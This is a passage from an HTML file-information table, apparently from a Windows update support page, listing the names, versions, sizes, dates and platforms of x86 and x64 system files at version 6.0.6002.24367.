applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,210,040</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntkrnlpa.exe</td><td>6.0.6002.24367</td><td>3,582,656</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>3,494,592</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>783,872</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>342,528</td><td>28-Apr-2018</td><td>01:15</td><td>x86</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>Not applicable</td></tr><tr><td>Videoprt.sys</td><td>6.0.6002.24367</td><td>105,472</td><td>28-Apr-2018</td><td>01:45</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>230,592</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>371,200</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>382,464</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,808</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>366,080</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>383,488</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>374,272</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,416</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,904</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,079,808</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>58,368</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,102,528</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,089,216</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winresume.efi</td><td>6.0.6002.24367</td><td>998,080</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>987,328</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not 